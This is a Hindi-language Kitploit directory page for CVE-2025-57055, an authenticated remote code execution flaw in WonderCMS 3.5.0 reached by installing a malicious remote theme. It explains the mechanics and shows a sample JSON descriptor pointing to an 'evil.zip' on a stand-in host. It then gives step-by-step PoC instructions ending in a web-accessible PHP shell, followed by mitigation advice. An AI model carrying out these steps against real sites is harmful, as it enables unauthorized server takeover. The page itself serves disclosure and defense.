Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-57055 — WonderCMS 3.5.0 के लिए प्रमाणित RCE शोषण, दुर्भावनापूर्ण थीम इंस्टॉलेशन के माध्यम से। इसमें कमजोरी की कार्यप्रणाली, PoC, और सुरक्षा परीक्षण और शिक्षा के लिए शमन मार्गदर्शन शामिल है। | Kitploit
उपकरण/GitHubGitHub/thawphone/cve-2025-57055
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubthawphone/cve-2025-57055

CVE-2025-57055

WonderCMS 3.5.0 के लिए प्रमाणित RCE शोषण, दुर्भावनापूर्ण थीम इंस्टॉलेशन के माध्यम से। इसमें कमजोरी की कार्यप्रणाली, PoC, और सुरक्षा परीक्षण और शिक्षा के लिए शमन मार्गदर्शन शामिल है।

रिपॉजिटरी देखें
0 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-57055: WonderCMS 3.5.0 में प्रमाणित दूरस्थ कोड निष्पादन

भेद्यता यांत्रिकी

WonderCMS v3.5.0 में एक प्रमाणित दूरस्थ कोड निष्पादन (RCE) भेद्यता मौजूद है।

यह समस्या एप्लिकेशन द्वारा JSON डिस्क्रिप्टर के माध्यम से दूरस्थ थीम/मॉड्यूल इंस्टॉलेशन को संभालने के तरीके से उत्पन्न होती है। जब कोई व्यवस्थापक एक ZIP संग्रह का संदर्भ देने वाली दूरस्थ JSON फ़ाइल सबमिट करता है, तो उसकी सामग्री वेब-सुलभ निर्देशिका (जैसे, /themes/) में निकाली जाती है। यदि ZIP में कोई PHP फ़ाइल है, तो वह फ़ाइल वेब पर सुलभ हो जाती है और निष्पादित की जा सकती है।

यह व्यवहार निम्नलिखित कारणों से RCE जोखिम उत्पन्न करता है:

  • ZIP सामग्री पर सत्यापन या स्वच्छता का अभाव।
  • दूरस्थ स्रोतों से निकाली गई फ़ाइल प्रकारों पर कोई प्रतिबंध नहीं।
  • थीम/प्लगइन निर्देशिकाओं की वेब-सुलभता।

नोट: व्यवस्थापक प्रमाणीकरण आवश्यक है, लेकिन डिफ़ॉल्ट इंस्टॉलेशन व्यवस्थापक पासवर्ड को सार्वजनिक रूप से (होमपेज पर) उजागर करते हैं, केवल पासवर्ड लॉगिन का उपयोग करते हैं, और मजबूत प्रमाणीकरण नियंत्रण लागू नहीं करते हैं।

दूरस्थ मॉड्यूल/थीम डिस्क्रिप्टर के लिए स्वीकृति मानदंड

WonderCMS दूरस्थ मॉड्यूल/थीम स्वीकार करेगा और उन्हें स्थापित करने का प्रयास करेगा यदि सबमिट किया गया JSON डिस्क्रिप्टर अपेक्षित wcms-modules.json प्रारूप से मेल खाता है। एक डिस्क्रिप्टर जो प्रारूप जांच पास करता है (और एक ZIP संग्रह की ओर इशारा करता है) को लाया जाएगा और उसके संग्रह की सामग्री को फ़ाइल प्रकारों के आगे सत्यापन के बिना वेब-सुलभ निर्देशिका (जैसे, ) में निकाला जाएगा।

/themes/<name>/

उदाहरण डिस्क्रिप्टर :

root@kitploit:~
{
  "themes": {
    "SSRF": {
      "name": "FAKE",
      "repo": "https://example.com/",
      "zip": "https://example.com/evil.zip",
      "summary": "test",
      "version": "1.0.0",
      "image": "https://example.com/fake.png"
    }
  }
}

अवधारणा का प्रमाण (PoC)

चेतावनी: उत्पादन प्रणालियों पर न चलाएं। केवल अधिकृत परीक्षण वातावरण का उपयोग करें।

  1. डिफ़ॉल्ट WonderCMS इंस्टॉलेशन के सार्वजनिक रूप से उजागर होमपेज से व्यवस्थापक पासवर्ड प्राप्त करें।

  2. व्यवस्थापक पैनल में लॉग इन करें।

  3. थीम इंस्टॉलेशन अनुभाग पर जाएं।

  4. एक दुर्भावनापूर्ण JSON डिस्क्रिप्टर का URL प्रदान करें (जैसे, हमलावर-नियंत्रित सर्वर पर होस्ट किया गया)।

  5. इंस्टॉलेशन आरंभ करें। सर्वर निम्नलिखित कार्य करेगा:

  • डिस्क्रिप्टर लाएगा।
  • निर्दिष्ट ZIP संग्रह डाउनलोड करेगा।
  1. डाउनलोड की गई दुर्भावनापूर्ण थीम स्थापित करें।

  2. मनमाने आदेशों को निष्पादित करने के लिए निकाली गई PHP शेल तक पहुंचें (जैसे, http://target.com/themes/<Theme_Name>/shell.php)।

(नोट: इन चरणों को केवल नियंत्रित परीक्षण वातावरण में ही करें। लाइव सिस्टम पर बिना प्राधिकरण के इस भेद्यता का शोषण करना गैरकानूनी है।)

विक्रेता प्रतिक्रिया

  • जुलाई 2025 में भेद्यता की सूचना WonderCMS अनुरक्षकों को दी गई थी।

  • अनुरक्षकों ने रिपोर्ट स्वीकार की लेकिन कहा कि उनके विचार में, यह व्यवहार व्यवस्थापकों के लिए स्वीकार्य है।

शमन मार्गदर्शन

जोखिम कम करने के लिए:

  • दूरस्थ स्थापना क्षमताओं को प्रतिबंधित करें केवल विश्वसनीय स्रोतों (जैसे, केवल GitHub) तक।
  • निकालने से पहले ZIP सामग्री को मान्य और स्वच्छ करें।
  • प्रमाणीकरण को सख्त करें:
    • स्थापना के बाद व्यवस्थापक पासवर्ड छुपाएं।
    • उपयोगकर्तानाम/पासवर्ड लॉगिन लागू करें।
    • बहु-कारक प्रमाणीकरण सक्षम करें (यदि उपलब्ध हो)।
  • सर्वर कॉन्फ़िगरेशन के माध्यम से themes/ या plugins/ के अंदर निष्पादन योग्य फ़ाइलों तक पहुंच रोकें।

संदर्भ

  • WonderCMS GitHub
  • OWASP A05:2021 – सुरक्षा गलत कॉन्फ़िगरेशन
  • CWE-434 – खतरनाक प्रकार वाली फ़ाइल का अप्रतिबंधित अपलोड

अस्वीकरण

यह जानकारी रक्षात्मक सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए प्रदान की गई है। भेद्यताओं का परीक्षण या खुलासा करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

टूल डाउनलोड करें